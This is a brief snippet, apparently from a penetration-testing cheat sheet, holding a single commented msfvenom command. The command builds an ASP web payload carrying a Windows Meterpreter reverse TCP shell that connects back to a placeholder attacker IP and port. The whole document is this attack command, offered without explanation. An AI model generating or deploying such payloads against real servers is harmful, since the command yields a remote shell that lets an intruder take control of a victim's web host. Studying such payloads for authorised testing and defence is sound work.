# ASP meterpreter payload # msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \ -f asp -o ${NAME}.asp